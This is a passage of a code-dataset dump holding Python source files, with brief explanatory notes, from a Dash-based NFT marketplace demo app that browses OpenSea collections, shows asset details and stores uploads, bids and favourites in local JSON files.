"license_type": "no_license",
"max_line_length": 80,
"num_lines": 13,
"path": "/app.py",
"repo_name": "KineBergseth/stacc-Kodekonkurranse-2021",
"src_encoding": "UTF-8",
"text": "import dash\nimport dash_bootstrap_components as dbc\n\n# bootstrap theme imported from\n# https://bootswatch.com/lux\nexternal_stylesheets = [dbc.themes.LUX]\n\napp = dash.Dash(__name__, external_stylesheets=external_stylesheets, meta_tags=[\n {\"name\": \"viewport\", \"content\": \"width=device-width, initial-scale=1\"}\n ])\napp.title = 'NFT'\nserver = app.server\napp.config.suppress_callback_exceptions = True\n"
},
{
"alpha_fraction": 0.5603305697441101,
"alphanum_fraction": 0.5603305697441101,
"avg_line_length": 29.25,
"blob_id": "36d646a0cec9e77a92552c1c01a6d7d8fef7453d",
"content_id": "c650d66ee3617062d5c16dc7d823917e96096e85",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 605,
"license_type": "no_license",
"max_line_length": 73,
"num_lines": 20,
"path": "/navbar.py",
"repo_name": "KineBergseth/stacc-Kodekonkurranse-2021",
"src_encoding": "UTF-8",
"text": "import dash_bootstrap_components as dbc\n\n\ndef Navbar():\n navbar = dbc.NavbarSimple(\n children=[\n dbc.NavItem(dbc.NavLink(\"Marketplace\", href=\"/marketplace\")),\n dbc.NavItem(dbc.NavLink(\"Collections\", href=\"/collections\")),\n dbc.NavItem(dbc.NavLink(\"Activity\", href=\"/events\")),\n dbc.NavItem(dbc.NavLink(\"Upload NFT\", href=\"/upload\")),\n dbc.NavItem(dbc.NavLink(\"Profile\", href=\"/profile\")),\n\n ],\n brand=\"Home\",\n brand_href=\"/home\",\n sticky=\"top\",\n className=\"\",\n expand=\"md\",\n )\n return navbar\n"
},
{
"alpha_fraction": 0.544739305973053,
"alphanum_fraction": 0.5483397841453552,
"avg_line_length": 34.8803825378418,
"blob_id": "c981b92ae37788f65bbe1c59690d408444ffbe7e",
"content_id": "17d3fdeffcf6adf4ab7deaba04f1ace8f4a1a613",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7499,
"license_type": "no_license",
"max_line_length": 110,
"num_lines": 209,
"path": "/apps/marketplace.py",
"repo_name": "KineBergseth/stacc-Kodekonkurranse-2021",
"src_encoding": "UTF-8",
"text": "import requests\nimport pandas as pd\nimport dash_bootstrap_components as dbc\nfrom dash import html, Input, Output\nfrom app import app\n\n\n# convert snake case variables to readable text with capitalized letter\ndef convert_snake(snake_case):\n return snake_case.replace(\"_\", \" \").title()\n\n\ndef convert_slugs(snake_case):\n return snake_case.replace(\"-\", \" \").title()\n\n\ndef convert_price(price):\n \"\"\"\n Convert currency value from WEI to ETH if its not nan\n :param price: amount in WEI\n :return: amount in ETH\n \"\"\"\n if pd.isna(price):\n return price\n else:\n return f\"{(price / pow(10, 18))} ETH\"\n\n\ndef get_collection_slug():\n \"\"\"\n Get a set of 300 slugs to display in the collections dropdownlist\n :return: list of 300 unique slugs\n \"\"\"\n url = \"https://api.opensea.io/api/v1/collections?offset=0&limit=300\"\n response = requests.request(\"GET\", url)\n data = response.json()\n df = pd.json_normalize(data['collections'])\n df = pd.DataFrame(df)\n collection = df['slug'].tolist()\n return collection\n\n\ndef get_assets(order_by, order_direction, offset, limit, collection):\n \"\"\"\n Get assets to display on page\n :param order_by: how to order the assets\n :param order_direction: asc/desc direction\n :param offset: offset for request\n :param limit: how many assets are shown on the page\n :param collection: unique slug that gets assets belonging to that collection\n :return: dataframe containing data about all assets fetched\n \"\"\"\n url = \"https://api.opensea.io/api/v1/assets\"\n querystring = {\"order_by\": f\"{order_by}\", \"order_direction\": f\"{order_direction}\", \"offset\": f\"{offset}\",\n \"limit\": f\"{limit}\", \"collection\": f\"{collection}\"}\n response = requests.request(\"GET\", url, params=querystring)\n data = response.json()\n df = pd.json_normalize(data['assets'])\n col_list = ['id', 'token_id', 'name', 'image_url', 'collection.name', 'last_sale.total_price',\n 'asset_contract.address']\n df = pd.DataFrame(df, columns=col_list)\n # convert price from last sale to float, so i can do math\n df['last_sale.total_price'] = df['last_sale.total_price'].astype(float)\n df['last_sale.total_price'] = df['last_sale.total_price'].apply(convert_price)\n return df\n\n\ndef create_card(card_img, card_collection, card_title, card_price, token_id, asset_contract_address):\n \"\"\"\n Create a card with data about a specific NFT\n :param card_img: image link\n :param card_collection: collection name\n :param card_title: name of NFT\n :param card_price: price from last sale in ETH\n :param token_id: token id for NFT\n :param asset_contract_address: contract address for NFT\n :return: html with data for an asset\n \"\"\"\n asset_link = dbc.CardLink(\"{name}\".format(name=card_title),\n href=\"/asset?asset_contract_address={address}&token_id={token_id}\".format(\n address=asset_contract_address, token_id=token_id))\n return dbc.Card(\n [\n dbc.CardImg(src=card_img, top=True),\n dbc.CardBody(\n [\n html.H4(asset_link, className=\"card-title\"),\n html.P(card_collection, className=\"card-text\"),\n html.P(card_price, className=\"card-text\"),\n ],\n className=\"card-body\",\n ),\n ],\n className=\"card border-secondary col\"\n )\n\n\ndef create_cardgrid(data):\n \"\"\"\n Create cardgrid with a card for each asset\n :param data: dataframe containing asset data\n :return: html grid containing all the individual cards\n \"\"\"\n cards = []\n for item in data.index:\n cards.append(create_card(data['image_url'][item], data['name'][item], 
data['collection.name'][item],\n data['last_sale.total_price'][item], data['token_id'][item],\n data['asset_contract.address'][item]))\n return html.Div(cards, className=\"col_card_grid row row-cols-5\")\n\n\ndef create_layout():\n collections = get_collection_slug()\n # sale_price param does not work on query - status 500 internal service error\n order_by_list = ['pk', 'sale_date', 'sale_count'] # order choices\n\n # create filter controls\n controls = [\n html.Div(\n [\n dbc.Label(\"Collection\", className=\"form-label\"),\n dbc.Select(\n id=\"collection-input\",\n className=\"form-select\",\n options=[{'label': 'Select all', 'value': ''}] +\n [{\"label\": convert_slugs(c), \"value\": c}\n for c in collections],\n value='', # set select all to default value\n ),\n ],\n className=\"form-group\",\n ),\n html.Div(\n [\n dbc.Label(\"Sort by\", className=\"form-label\"),\n dbc.Select(\n id=\"order-by-input\",\n className=\"form-select\",\n value=order_by_list[0],\n options=[\n {\"label\": convert_snake(o), \"value\": o}\n for o in order_by_list\n ],\n ),\n ],\n className=\"form-group\",\n ),\n html.Div(\n [\n dbc.Label(\"Order\", className=\"form-check-label\"),\n dbc.RadioItems(\n options=[\n {\"label\": \"desc\", \"value\": \"desc\"},\n {\"label\": \"asc\", \"value\": \"asc\"},\n ],\n value=\"desc\",\n id=\"order-direction-input\",\n ),\n ],\n className=\"form-group\",\n ),\n html.Div(\n [\n dbc.Label(\"Page\"),\n html.Br(),\n dbc.Pagination(max_value=5, first_last=True, active_page=1, id=\"asset_pagination\",\n className=\"pagination\"),\n ]\n ),\n ]\n\n return html.Div(\n [\n html.Div(\n [\n dbc.Card([dbc.CardHeader(\"Filter\", className=\"card-header text-muted\"),\n dbc.CardBody([dbc.Row([dbc.Col(c) for c in controls])], className=\"card-body\")],\n body=True,\n className=\"card border-light mb-3\"), # create sorting controls\n ],\n className=\"header\",\n ),\n html.Div(id=\"card-grid-content\"),\n ],\n className=\"main\"\n )\n\n\[email protected](\n Output(\"card-grid-content\", \"children\"),\n [Input(\"collection-input\", \"value\"),\n Input(\"order-by-input\", \"value\"),\n Input(\"order-direction-input\", \"value\"),\n Input(\"asset_pagination\", \"active_page\")]\n)\ndef update_grid(collection, order_by, order_direction, page_no):\n \"\"\"\n Takes input and creates the grid based on choices or default values\n :param collection: collection name\n :param order_by: order of assets\n :param order_direction: asc/desc\n :param page_no: the current page number, for pagination/offset\n :return: card grid with data matching applied filter\n \"\"\"\n limit = 20\n page_no = page_no\n offset = (page_no * limit) - limit\n assets = get_assets(order_by, order_direction, offset, limit, collection)\n return create_cardgrid(assets)\n"
},
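The two label helpers at the top of `marketplace.py` are pure string transforms, so their behaviour is easy to pin down with a couple of usage examples (same definitions as in the file, shown here only to demonstrate the output):

```python
def convert_snake(snake_case):
    return snake_case.replace("_", " ").title()

def convert_slugs(snake_case):
    return snake_case.replace("-", " ").title()

print(convert_snake("sale_count"))    # Sale Count
print(convert_slugs("bears-deluxe"))  # Bears Deluxe
```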
{
"alpha_fraction": 0.5109890103340149,
"alphanum_fraction": 0.7051281929016113,
"avg_line_length": 17.200000762939453,
"blob_id": "813d15a5d3d6cff64633926194c2553a4f92aaa2",
"content_id": "ab0aebf32e0ffd9bcc51f3ad5bcc9ebcb67b51cc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 546,
"license_type": "no_license",
"max_line_length": 35,
"num_lines": 30,
"path": "/requirements.txt",
"repo_name": "KineBergseth/stacc-Kodekonkurranse-2021",
"src_encoding": "UTF-8",
"text": "Brotli==1.0.9\ncertifi==2021.5.30\ncharset-normalizer==2.0.6\nclick==8.0.1\ncolorama==0.4.4\ndash==2.0.0\ndash-bootstrap-components==1.0.0rc1\ndash-core-components==2.0.0\ndash-html-components==2.0.0\ndash-table==5.0.0\nFlask==2.0.2\nFlask-Compress==1.10.1\ngunicorn==20.1.0\nidna==3.2\nimportlib-metadata==4.8.1\nitsdangerous==2.0.1\nJinja2==3.0.2\nMarkupSafe==2.0.1\nnumpy==1.21.2\npandas==1.3.3\nplotly==5.3.1\npython-dateutil==2.8.2\npytz==2021.3\nrequests==2.26.0\nsix==1.16.0\ntenacity==8.0.1\ntyping-extensions==3.10.0.2\nurllib3==1.26.7\nWerkzeug==2.0.1\nzipp==3.6.0\n"
},
{
"alpha_fraction": 0.7488188743591309,
"alphanum_fraction": 0.7606298923492432,
"avg_line_length": 32.421051025390625,
"blob_id": "9d57584579e59f89b9f37ca5e4639d37c248c751",
"content_id": "af44b44be895dcb153e47fa663ff145ab6dd1ebb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1270,
"license_type": "no_license",
"max_line_length": 124,
"num_lines": 38,
"path": "/README.md",
"repo_name": "KineBergseth/stacc-Kodekonkurranse-2021",
"src_encoding": "UTF-8",
"text": "# Stacc - Kodekonkurranse 2021\n\nA app where you can view NFTs, put inn fake offers and upload your own NFTs (they do not get uploaded for real).\nThe asset cards have links in the name, that takes you to a page displaying a single asset.\n\nDisclaimer: the marketplace may be a bit wonky sometimes, if some links are broken the cards will be text only,\ntry refreshing or messing around with the filter to get assets with data available :)\n\nThe webapp can be viewed here: \nhttps://stacc-nft.herokuapp.com/\n\n## Getting started \nThe app is written in Python with Dash framework. The app is also available on heroku.\nIf you want to run it locally follow the steps below:\n\n### Prerequisites\n- Python 3.X \n- Internet connection\n\n### Setup\nStart by opening your preferred terminal, and navigate to this project's directory.\nTo be able to run the code, you need to install the required python modules.\nYou install the required libraries by writing the following in your terminal:\n\n```\npip install -r requirements.txt\n```\n\n#### Running the code\n```\npython index.py\n```\n\nThe Dash app should now be running on http://127.0.0.1:8050/, and you must open up that address in a browser of your choice.\n\n\nOpenSea API was used for the project:\nhttps://docs.opensea.io/reference/api-overview\n"
}
] | 12 |
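The update_grid callback in the Dash app above turns a 1-based page number into a query offset with (page_no * limit) - limit. A minimal standalone sketch of just that arithmetic; the limit of 20 matches the callback, while the helper name is my own:

def page_to_offset(page_no, limit=20):
    """Convert a 1-based page number into a limit/offset query offset."""
    return (page_no * limit) - limit

assert page_to_offset(1) == 0   # page 1 starts at the first row
assert page_to_offset(3) == 40  # page 3 skips two full pages of 20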
woodmanwumeng/sqlalchemy
|
https://github.com/woodmanwumeng/sqlalchemy
|
759284fd129afe298ea281f1addcbce7eda7389e
|
038ee979985c5585287c5636bbfde607082f5130
|
7c930695be7e7ab4f10674701d018737c7954392
|
refs/heads/master
| 2023-02-12T19:07:59.358491 | 2021-01-15T04:01:13 | 2021-01-15T04:35:41 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.4934675097465515,
"alphanum_fraction": 0.5061793923377991,
"avg_line_length": 30.120878219604492,
"blob_id": "09a24418e0d00fd9c82a24ebd4c7808f7985c42f",
"content_id": "f6d48f3c65b0a4360d594544f3af3d65f0e1db40",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5664,
"license_type": "permissive",
"max_line_length": 77,
"num_lines": 182,
"path": "/test/dialect/postgresql/test_async_pg_py3k.py",
"repo_name": "woodmanwumeng/sqlalchemy",
"src_encoding": "UTF-8",
"text": "import random\n\nfrom sqlalchemy import Column\nfrom sqlalchemy import exc\nfrom sqlalchemy import Integer\nfrom sqlalchemy import MetaData\nfrom sqlalchemy import String\nfrom sqlalchemy import Table\nfrom sqlalchemy import testing\nfrom sqlalchemy.dialects.postgresql import ENUM\nfrom sqlalchemy.ext.asyncio import create_async_engine\nfrom sqlalchemy.testing import async_test\nfrom sqlalchemy.testing import engines\nfrom sqlalchemy.testing import fixtures\n\n\nclass AsyncPgTest(fixtures.TestBase):\n __requires__ = (\"async_dialect\",)\n __only_on__ = \"postgresql+asyncpg\"\n\n @testing.fixture\n def async_engine(self):\n return create_async_engine(testing.db.url)\n\n @testing.fixture()\n def metadata(self):\n # TODO: remove when Iae6ab95938a7e92b6d42086aec534af27b5577d3\n # merges\n\n from sqlalchemy.testing import util as testing_util\n from sqlalchemy.sql import schema\n\n metadata = schema.MetaData()\n\n try:\n yield metadata\n finally:\n testing_util.drop_all_tables_from_metadata(metadata, testing.db)\n\n @async_test\n async def test_detect_stale_ddl_cache_raise_recover(\n self, metadata, async_engine\n ):\n async def async_setup(engine, strlen):\n metadata.clear()\n t1 = Table(\n \"t1\",\n metadata,\n Column(\"id\", Integer, primary_key=True),\n Column(\"name\", String(strlen)),\n )\n\n # conn is an instance of AsyncConnection\n async with engine.begin() as conn:\n await conn.run_sync(metadata.drop_all)\n await conn.run_sync(metadata.create_all)\n await conn.execute(\n t1.insert(),\n [{\"name\": \"some name %d\" % i} for i in range(500)],\n )\n\n meta = MetaData()\n\n t1 = Table(\n \"t1\",\n meta,\n Column(\"id\", Integer, primary_key=True),\n Column(\"name\", String),\n )\n\n await async_setup(async_engine, 30)\n\n second_engine = engines.testing_engine(asyncio=True)\n\n async with second_engine.connect() as conn:\n result = await conn.execute(\n t1.select()\n .where(t1.c.name.like(\"some name%\"))\n .where(t1.c.id % 17 == 6)\n )\n\n rows = result.fetchall()\n assert len(rows) >= 29\n\n await async_setup(async_engine, 20)\n\n async with second_engine.connect() as conn:\n with testing.expect_raises_message(\n exc.NotSupportedError,\n r\"cached statement plan is invalid due to a database schema \"\n r\"or configuration change \\(SQLAlchemy asyncpg dialect \"\n r\"will now invalidate all prepared caches in response \"\n r\"to this exception\\)\",\n ):\n\n result = await conn.execute(\n t1.select()\n .where(t1.c.name.like(\"some name%\"))\n .where(t1.c.id % 17 == 6)\n )\n\n # works again\n async with second_engine.connect() as conn:\n result = await conn.execute(\n t1.select()\n .where(t1.c.name.like(\"some name%\"))\n .where(t1.c.id % 17 == 6)\n )\n\n rows = result.fetchall()\n assert len(rows) >= 29\n\n @async_test\n async def test_detect_stale_type_cache_raise_recover(\n self, metadata, async_engine\n ):\n async def async_setup(engine, enums):\n metadata = MetaData()\n Table(\n \"t1\",\n metadata,\n Column(\"id\", Integer, primary_key=True),\n Column(\"name\", ENUM(*enums, name=\"my_enum\")),\n )\n\n # conn is an instance of AsyncConnection\n async with engine.begin() as conn:\n await conn.run_sync(metadata.drop_all)\n await conn.run_sync(metadata.create_all)\n\n t1 = Table(\n \"t1\",\n metadata,\n Column(\"id\", Integer, primary_key=True),\n Column(\n \"name\",\n ENUM(\n *(\"beans\", \"means\", \"keens\", \"faux\", \"beau\", \"flow\"),\n name=\"my_enum\"\n ),\n ),\n )\n\n await async_setup(async_engine, (\"beans\", \"means\", \"keens\"))\n\n second_engine = 
engines.testing_engine(\n asyncio=True,\n options={\"connect_args\": {\"prepared_statement_cache_size\": 0}},\n )\n\n async with second_engine.connect() as conn:\n await conn.execute(\n t1.insert(),\n [\n {\"name\": random.choice((\"beans\", \"means\", \"keens\"))}\n for i in range(10)\n ],\n )\n\n await async_setup(async_engine, (\"faux\", \"beau\", \"flow\"))\n\n async with second_engine.connect() as conn:\n with testing.expect_raises_message(\n exc.InternalError, \"cache lookup failed for type\"\n ):\n await conn.execute(\n t1.insert(),\n [\n {\"name\": random.choice((\"faux\", \"beau\", \"flow\"))}\n for i in range(10)\n ],\n )\n\n # works again\n async with second_engine.connect() as conn:\n await conn.execute(\n t1.insert(),\n [\n {\"name\": random.choice((\"faux\", \"beau\", \"flow\"))}\n for i in range(10)\n ],\n )\n"
}
] | 1 |
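Both tests above lean on the same asyncio pattern: open an AsyncConnection and call run_sync() to drive the synchronous MetaData helpers. A minimal sketch of just that pattern, assuming a reachable PostgreSQL server; the DSN below is a placeholder, not a value from the tests:

import asyncio
from sqlalchemy import Column, Integer, MetaData, String, Table
from sqlalchemy.ext.asyncio import create_async_engine

metadata = MetaData()
t1 = Table("t1", metadata,
           Column("id", Integer, primary_key=True),
           Column("name", String(30)))

async def main():
    # placeholder DSN - replace with a real asyncpg connection string
    engine = create_async_engine("postgresql+asyncpg://user:pass@localhost/db")
    async with engine.begin() as conn:  # conn is an AsyncConnection
        await conn.run_sync(metadata.create_all)  # run sync DDL helpers
        await conn.execute(t1.insert(), [{"name": "demo"}])
    await engine.dispose()

# asyncio.run(main())  # uncomment once a real server is available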
RasmusEduards/IP_tool
|
https://github.com/RasmusEduards/IP_tool
|
924140796b577ec4f3a16060992f071bf150145a
|
a268749d5e40e6408e748a11f2f1f2e03b0a2593
|
b1478336d9d6915b88e41bb22f68a8a4750de9fb
|
refs/heads/main
| 2023-04-17T14:04:58.701177 | 2021-05-04T08:21:38 | 2021-05-04T08:21:38 | 364,184,013 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6617100238800049,
"alphanum_fraction": 0.6988847851753235,
"avg_line_length": 18.14285659790039,
"blob_id": "e63e06403a4ca07aa1594fdeceaedffad4ecc6b1",
"content_id": "14e90bc65d30230cfc42453bb1a98a7097b1540a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 269,
"license_type": "no_license",
"max_line_length": 37,
"num_lines": 14,
"path": "/cidrcalc.py",
"repo_name": "RasmusEduards/IP_tool",
"src_encoding": "UTF-8",
"text": "import ipaddress\n\ncidr1 = input(\"Enter CIDR range 1: \")\n\ncidr2 = input(\"Enter CIDR range 2: \")\n\n\nn1 = ipaddress.ip_network(cidr1)\nn2 = ipaddress.ip_network(cidr2)\n\nif n1.overlaps(n2) == True:\n\tprint(\"CIDRs are overlapping!\")\nelse:\n\tprint(\"CIDRs are NOT overlapping!\")\n\n"
},
{
"alpha_fraction": 0.7837837934494019,
"alphanum_fraction": 0.7837837934494019,
"avg_line_length": 36,
"blob_id": "d0f06cf7af6a7360aa08b15110505147b6d44cac",
"content_id": "377243c2dfc4f0a1ea5a3f802737326aac348141",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 74,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 2,
"path": "/README.md",
"repo_name": "RasmusEduards/IP_tool",
"src_encoding": "UTF-8",
"text": "# IP_tool\nThis tool checks wheter two CIDR ranges are overlapping or not.\n"
}
] | 2 |
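The overlap test in cidrcalc.py above is a single stdlib call; here is a sketch with hard-coded networks in place of input() (the example addresses are my own):

import ipaddress

n1 = ipaddress.ip_network("10.0.0.0/16")
n2 = ipaddress.ip_network("10.0.1.0/24")  # contained in n1

print(n1.overlaps(n2))                                      # True
print(n1.overlaps(ipaddress.ip_network("192.168.0.0/24")))  # False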
HustlerQian/Pubmed_MongoDB
|
https://github.com/HustlerQian/Pubmed_MongoDB
|
85c5b7187fcf821a92c26adf23bb9d161f2c935c
|
6ee13005229230a90eb71aa1adb633bec096299b
|
27941d279ab9734a892986f1b33381a8fd8294fb
|
refs/heads/master
| 2018-03-07T15:19:39.983838 | 2016-08-31T05:06:10 | 2016-08-31T05:06:10 | 64,978,194 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.4830188751220703,
"alphanum_fraction": 0.4930817484855652,
"avg_line_length": 32.284481048583984,
"blob_id": "3efbbecdff267704b95d32eb81ebc291007b5b5c",
"content_id": "3dc621c995d7b9a7fe95687f1aa34ae18634ae06",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4027,
"license_type": "no_license",
"max_line_length": 104,
"num_lines": 116,
"path": "/Medline2Json.py",
"repo_name": "HustlerQian/Pubmed_MongoDB",
"src_encoding": "UTF-8",
"text": "#coding:utf-8\r\n\r\nimport re,os,json \r\n\r\n#medline_path='..\\\\network_approach\\\\materials\\\\cas9_researchRe\\\\fromPUBMED_2015.1.22\\\\cas9_medline.txt'\r\n#out_dir='..\\\\network_approach\\\\literature\\\\abs\\\\'\r\n#path='..\\\\pubmed\\\\'\r\n#f=open(path,'r')\r\n#data=f.readlines()\r\n#f.close()\r\n#\r\ndef ToJson(path,TestJson):\r\n f=open(path,'r')\r\n data=f.readlines()\r\n #尾行加一行假的PMID-\r\n data.append('PMID- ')\r\n f.close()\r\n Medline={}\r\n pmid,ab,ab_start='','',0\r\n keyword,keyword_start='',0\r\n dateaccess,datepublish='',''\r\n fullauthor,fullauthor_start='',0\r\n publication_type,publication_status,language='','',''\r\n title,journal,journalabbreviation='','',''\r\n meshterm=''\r\n status=''\r\n for i in range(0,len(data)):\r\n line=data[i]\r\n if line.startswith('PMID- '):\r\n if len(ab)!=0 and pmid!='':\r\n Medline['Abstrat']=ab\r\n Medline['PmID']=pmid\r\n Medline['DateAccess']=dateaccess\r\n Medline['DatePublish']=datepublish\r\n Medline['FullAuthor']=fullauthor\r\n Medline['Title']=title\r\n Medline['Journal']=journal\r\n Medline['JournalAbbreviation']=journalabbreviation\r\n Medline['Keyword']=keyword\r\n Medline['MeshTerm']=meshterm\r\n Medline['PublicationType']=publication_type\r\n Medline['PublicationStatus']=publication_status\r\n Medline['Language']=language\r\n Medline['Status']=status\r\n TestJson.append(Medline)\r\n Medline={}\r\n pmid=line[6:].strip()\r\n ab,ab_start='',0\r\n keyword,keyword_start='',0\r\n dateaccess,datepublish='',''\r\n fullauthor=''\r\n publication_type,publication_status,language='','',''\r\n title,journal,journalabbreviation='','',''\r\n meshterm=''\r\n status=''\r\n #找到Abstract\r\n if line.startswith('AB - '):\r\n ab=line[6:].strip()\r\n ab_start=1\r\n else:\r\n if ab_start==1 and line.startswith(' '):\r\n ab+=' '+line.strip()\r\n if ab_start==1 and line[0]!=' ':\r\n ab_start=0\r\n #找到Keyword\r\n if line.startswith('OT -'):\r\n if keyword!='':\r\n keyword+='|'+line[6:].strip()\r\n else:\r\n keyword=line[6:].strip()\r\n #找到MeshTerm\r\n if line.startswith('MH -'):\r\n if meshterm!='':\r\n meshterm+='|'+line[6:].strip()\r\n else:\r\n meshterm=line[6:].strip() \r\n #找到FullAuthor \r\n if line.startswith('FAU -'):\r\n if fullauthor!='':\r\n fullauthor+='|'+line[6:].strip()\r\n else:\r\n fullauthor=line[6:].strip() \r\n if line.startswith('DA -'):\r\n dateaccess=line[6:].strip() \r\n if line.startswith('DP -'):\r\n datepublish=line[6:].strip() \r\n if line.startswith('TI -'):\r\n title=line[6:].strip()\r\n if line.startswith('JT -'):\r\n journal=line[6:].strip()\r\n if line.startswith('TA -'):\r\n journalabbreviation=line[6:].strip()\r\n if line.startswith('PT -'):\r\n publication_type=line[6:].strip()\r\n if line.startswith('PST -'):\r\n publication_status=line[6:].strip() \r\n if line.startswith('LA -'):\r\n language=line[6:].strip()\r\n if line.startswith('STAT-'):\r\n status=line[6:].strip()\r\n return TestJson\r\n\r\n \r\n\r\n\r\ndef main():\r\n open_path='.\\\\pubmed\\\\'\r\n #初始化Json,未来按年份输出\r\n TestJson=[]\r\n for root,dirs,filelists in os.walk(open_path):\r\n for file in filelists:\r\n path=os.path.join(root,file)\r\n TestJson=ToJson(path,TestJson)\r\n json.dump(TestJson,open('.\\\\TestJson.json','w'),indent=4)\r\nif __name__=='__main__':\r\n main()"
}
] | 1 |
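Medline2Json.py works line by line on MEDLINE's tag-prefixed format: a tag such as PMID or AB starts a field, and indented lines continue the previous field. A condensed sketch of that idea on a made-up record; this is not the script's exact logic, which tracks each field in its own variable:

sample = """PMID- 12345
TI  - A made-up title
AB  - First line of the abstract
      second line of the abstract
"""

record, last_tag = {}, None
for line in sample.splitlines():
    if line.startswith(" ") and last_tag:  # continuation of previous field
        record[last_tag] += " " + line.strip()
    elif "- " in line:
        tag, value = line.split("- ", 1)
        last_tag = tag.strip()
        record[last_tag] = value.strip()

print(record)  # {'PMID': '12345', 'TI': '...', 'AB': 'First ... second ...'}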
koallen/ntu-course-planner-cli
|
https://github.com/koallen/ntu-course-planner-cli
|
da49bfd4ec0d0985bb11bef444d1f2e518a0a017
|
45af764daa1f7e4e42d21d8e8c9fe5f561e9e24a
|
50aeb3487a08fa2a35baac23552cab4e25ecec0c
|
refs/heads/master
| 2023-07-07T16:59:50.093904 | 2023-07-04T02:41:37 | 2023-07-04T02:41:37 | 27,982,499 | 8 | 9 |
MIT
| 2014-12-14T03:50:22 | 2023-02-13T10:25:16 | 2023-07-04T02:41:38 |
Python
|
[
{
"alpha_fraction": 0.6912751793861389,
"alphanum_fraction": 0.6912751793861389,
"avg_line_length": 20.285715103149414,
"blob_id": "e5ef74b38314ea730cc81dadbdc33fcba7333701",
"content_id": "934802ba6ff82331073dcc27698b254a4457110c",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Makefile",
"length_bytes": 149,
"license_type": "permissive",
"max_line_length": 66,
"num_lines": 7,
"path": "/Makefile",
"repo_name": "koallen/ntu-course-planner-cli",
"src_encoding": "UTF-8",
"text": ".PHONY: build upload\n\nbuild:\n\t. venv/bin/activate && rm -rf dist && python setup.py bdist_wheel\n\nupload:\n\t. venv/bin/activate && twine upload dist/*\n"
},
{
"alpha_fraction": 0.6333333253860474,
"alphanum_fraction": 0.6411111354827881,
"avg_line_length": 35,
"blob_id": "e48eab605dc58689f1724b9d2129dda13513f9b8",
"content_id": "7b7736c66b214aa18daf20efa8b7b6ee66e6c533",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 900,
"license_type": "permissive",
"max_line_length": 76,
"num_lines": 25,
"path": "/ntu_course_planner/ssl_type.py",
"repo_name": "koallen/ntu-course-planner-cli",
"src_encoding": "UTF-8",
"text": "\"\"\"\nCodes are from http://lukasa.co.uk/2013/01/Choosing_SSL_Version_In_Requests/\n\nIt is used to choose a SSL version manually so that I can successfully\nconnect to NTU server to fetch course schedule data.\n\nThanks for Lukasa's work :)\n\"\"\"\n\nfrom requests.adapters import HTTPAdapter\nfrom requests.packages.urllib3.poolmanager import PoolManager\n\nclass SSLAdapter(HTTPAdapter):\n \"\"\"An HTTPS Transport Adapter that uses an arbitrary SSL version.\"\"\"\n\n def __init__(self, ssl_version=None, **kwargs):\n self.ssl_version = ssl_version\n\n super(SSLAdapter, self).__init__(**kwargs)\n\n def init_poolmanager(self, connections, maxsize, block=False):\n self.poolmanager = PoolManager(num_pools=connections,\n maxsize=maxsize,\n block=block,\n ssl_version=self.ssl_version)\n"
},
{
"alpha_fraction": 0.6487069129943848,
"alphanum_fraction": 0.6530172228813171,
"avg_line_length": 36.621620178222656,
"blob_id": "7a92f370cec0114ede7d028a9c0424aebe08c4da",
"content_id": "464e5355172417e102a760986ceff6f94a9f815d",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1392,
"license_type": "permissive",
"max_line_length": 85,
"num_lines": 37,
"path": "/setup.py",
"repo_name": "koallen/ntu-course-planner-cli",
"src_encoding": "UTF-8",
"text": "from setuptools import setup\n\nlong_description = \"\"\"\nThis is a tool for Nanyang Technological University students to plan their timetable.\nAfter you supply with the tool the courses that you intent to take in a semester, it\ncan automatically generate all the possible combinations of indexes for the courses\nthat you picked. It's guaranteed that there will be no timetable clash.\n\"\"\"\n\nsetup(\n name = \"ntu-course-planner\",\n version = \"1.0.3\",\n description = \"A course planner for Nanyang Technological University students\",\n long_description = long_description,\n url = \"https://github.com/koallen/ntu-course-planner-cli\",\n author = \"Liu Siyuan\",\n author_email = \"[email protected]\",\n license = \"MIT\",\n classifiers = [\n \"Development Status :: 5 - Production/Stable\",\n \"Environment :: Console\",\n \"Intended Audience :: End Users/Desktop\",\n \"Intended Audience :: Developers\",\n \"License :: OSI Approved :: MIT License\",\n \"Natural Language :: English\",\n \"Programming Language :: Python :: 3 :: Only\",\n \"Topic :: Utilities\"\n ],\n keywords = [\"course\", \"planner\", \"Nanyang Technological University\"],\n packages = [\"ntu_course_planner\"],\n install_requires = ['requests', 'beautifulsoup4'],\n entry_points = {\n \"console_scripts\": [\n 'ntu-course-planner = ntu_course_planner.main:main'\n ]\n }\n)\n"
},
{
"alpha_fraction": 0.5384615659713745,
"alphanum_fraction": 0.7435897588729858,
"avg_line_length": 18.5,
"blob_id": "c25b393a41fde08bf9ff3b2cfd594c989279b9a7",
"content_id": "8bde1ee95b51634d723901d2439a56dd249d7451",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 39,
"license_type": "permissive",
"max_line_length": 21,
"num_lines": 2,
"path": "/requirements.txt",
"repo_name": "koallen/ntu-course-planner-cli",
"src_encoding": "UTF-8",
"text": "requests==2.31.0\nbeautifulsoup4==4.3.2\n"
},
{
"alpha_fraction": 0.7444933652877808,
"alphanum_fraction": 0.757709264755249,
"avg_line_length": 36.83333206176758,
"blob_id": "70847746e09bb84a6e5102934290d71d04ac0a8e",
